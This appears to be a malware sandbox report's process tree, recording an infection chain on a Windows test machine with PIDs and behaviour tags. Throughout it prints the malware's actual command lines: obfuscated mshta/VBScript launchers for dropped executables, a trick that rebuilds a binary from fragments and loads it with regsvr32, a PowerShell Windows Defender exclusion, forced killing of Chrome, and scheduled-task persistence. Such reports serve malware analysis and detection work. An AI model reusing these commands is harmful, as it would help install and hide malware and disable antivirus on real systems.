C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\7989912.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\7989912.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )4⤵PID:2264
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\7989912.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\7989912.exe") do taskkill /im "%~nxT" /f5⤵PID:2156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "7989912.exe" /f6⤵
- Kills process with taskkill
PID:3452
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon173a360b525.exeMon173a360b525.exe1⤵
- Executes dropped EXE
PID:1868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6700707032.exe"2⤵PID:2860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9782952807.exe"2⤵PID:2544
-
C:\Users\Admin\AppData\Local\Temp\9782952807.exe"C:\Users\Admin\AppData\Local\Temp\9782952807.exe"3⤵
- Executes dropped EXE
PID:2668
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 14882⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:544 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))2⤵PID:2768
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f3⤵PID:3004
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt4⤵
- Executes dropped EXE
PID:836 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )5⤵PID:1252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN6⤵PID:1700
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "7⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"7⤵PID:2752
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /S YLIH.bIN7⤵PID:2700
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵PID:1668
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))1⤵PID:304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f2⤵
- Executes dropped EXE
PID:2272
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Loads dropped DLL
PID:1672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe1⤵
- Kills process with taskkill
PID:2700
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"1⤵
- Executes dropped EXE
PID:1764
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\1019845.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\1019845.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )1⤵PID:2632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\1019845.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\1019845.exe") do taskkill /im "%~nxT" /f2⤵PID:1696
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "1019845.exe" /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )4⤵PID:3480
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f5⤵PID:3536
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )4⤵PID:3668
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S5⤵PID:3720
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"6⤵PID:3764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "6⤵PID:3756
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 .\BgG1KXA.y -U -S6⤵PID:3780
-
-
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1748
-
C:\Windows\system32\taskeng.exetaskeng.exe {5688C2A3-1ACB-4875-913D-457A95E0614E} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3972
-
C:\Windows\system32\taskeng.exetaskeng.exe {0FD95B28-3797-44FB-91F6-500EA0F11324} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:4092
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:3208
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {97F473ED-3F4C-464D-BD3E-784BB7040E12} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3180
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3800
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2464
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3604
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3808
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3408
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7B2AEBB7-5D50-40A2-BBD0-742B09D245C7} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3620
-
C:\Windows\system32\taskeng.exetaskeng.exe {8A64C5D5-F61F-495A-8C33-4D6174EF6202} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3680
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1136
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2116
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3396
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:572
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3624
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2260
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1336
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3436
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3768
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1080
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3936
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1760
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3568
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1704
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2776
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3548
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1612
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:4032
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3860
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3572
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3404
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2848
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3584
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3708
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3860
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:436
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {718CEB6D-60AF-4B06-B117-746535343752} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1316
-
C:\Windows\system32\taskeng.exetaskeng.exe {54824E4C-1502-4D8B-A239-B8E5BBB154D6} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:828
-
C:\Windows\system32\taskeng.exetaskeng.exe {3EE02085-69F5-4FA2-B89B-D7CF18757C95} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3032
-
C:\Windows\system32\taskeng.exetaskeng.exe {51DC179C-AFE4-4548-8C9A-D36BD785DC5C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2548
-
C:\Windows\system32\taskeng.exetaskeng.exe {49C04505-3498-4227-B94E-BE8A6513A117} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3804
-
C:\Windows\system32\taskeng.exetaskeng.exe {CF7A3D0C-1C51-4214-80AC-F000B43CE062} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2616
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2240
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1696
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1C969D87-760B-4CF1-A55D-442493A72A49} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2472
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1628
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1804
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3876
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2920
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3976
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2776
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:4008
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:2120
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:1924
-
-
C:\Users\Admin\AppData\Roaming\ideghitC:\Users\Admin\AppData\Roaming\ideghit2⤵PID:3476
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F04E1CAB-6D1F-40C4-BA60-97F0C94B7D34} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:4080
-
C:\Windows\system32\taskeng.exetaskeng.exe {649938E3-1979-457E-A2C4-D823E160564C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2952